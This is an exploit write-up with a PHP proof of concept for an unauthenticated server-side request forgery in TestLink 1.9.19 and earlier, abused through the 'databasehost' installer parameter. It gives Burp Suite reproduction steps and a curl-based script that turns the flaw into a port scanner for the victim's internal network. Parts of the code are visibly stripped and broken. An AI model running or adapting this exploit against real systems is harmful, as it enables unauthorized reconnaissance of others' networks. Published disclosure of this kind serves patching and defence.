################################################################################################## #Exploit Title : TestLink (version <= 1.9.19) Server Side Request Forgery #Author : Manish Kishan Tanwar AKA error1046 #Vendor Link : http://testlink.org #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## ///////////////////////// //Vulnerability OverView ///////////////////////// TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network. This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost". Steps to Reproduce: =================== 1. Configure your web browser with any proxy software (i am using Burp Suite). 2. Access below mentioned URL in web browser and click "Continue" button: http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on 3. Turn on Burp Interception. 4. Now, in web browser, fill relevant information in input fields (Database admin login/Password etc) and click "Process TestLink Setup" button. 5. In Burp proxy, send the intercepted request to Burp Repeater tab by pressing "CTRL+R" key combination. 6. Switch to Burp Repeater tab and change the value of HTTP Post Parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux and SSH running on it), click "Go" button in Burp Repeater. 7. Application response will appear in Burp repeater response tab, which will beshowing that "MySQL server has gone away". 8. Now, change the value of "databasehost" from "localhost:22" to "localhost:1337", click "Go" button in Burp Repeater. 9. Application will respond with HTTP response having SQL server error message "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond". ////////////////////////// //Exploit code starts here ////////////////////////// --==[[Indishell forever]]==-- '; echo $head ; echo '
--==[[ TestLink SSRF Exploit POC]]==--
--==[[ With Love From IndiShell Crew]]==--
####################################################################################################################################
-==[[Greetz to]]==--
zero cool, code breaker ica, root_devil, google_warrior,INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Anurag, Hacker Fantastic and rest of TEAM INDISHELL
--==[[Love to]]==--
# My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3
####################################################################################################################################

'; ?>
Target URL:

Ports to be scan:     Host to be scan:
alert('Target is unreachable, Get me something working :|');
"; die(); } //////////////////////////// ///Time to get back to work /////////////////////////// else { echo "
"; if(!(strstr($list,","))=='') { $all_ports=array(); $ch = array(); $content = array(); $open = array(); $closed = array(); $all_ports=explode(',',$list); $n_time='5'; $t1 = microtime(true); $mh = curl_multi_init(); $i = 0; foreach($all_ports as $port) { $payload="isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword="; $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, $url_auth); curl_setopt($ch[$i], CURLOPT_HEADER, 0); curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); curl_setopt($ch[$i], CURLOPT_POST, 1); curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload); curl_multi_add_handle($mh, $ch[$i]); $i ++; } $active = null; do { $mrc = curl_multi_exec($mh, $active); usleep(200000); // limit requests for a while } while ($active); $i = 0; foreach ($ch AS $i => $c) { $content[$i] = curl_multi_getcontent($c); curl_multi_remove_handle($mh, $c); } curl_multi_close($mh); for($j=0;$j < count($content);$j++) { if(!(strstr($content[$j],'refused'))=='') { // echo "Port $all_ports[$j] is closed
"; } else { //echo "port $all_ports[$j] is open 8-)
"; array_push($open,$all_ports[$j]); } } echo ''; foreach($open as $in_open) { echo ''; } echo '
--==[[ Open Ports on Target server '.$h0st.' ]]==--
Port '.$in_open.'
'; } else { } } } echo "Developed By 1046 at IndiShell Lab"; ?> ///////////////////// //Exploit code end ///////////////////// --==[[ Greetz To ]]==-- Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad, Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256 Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, Bikash Dash --==[[Love to]]==-- My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)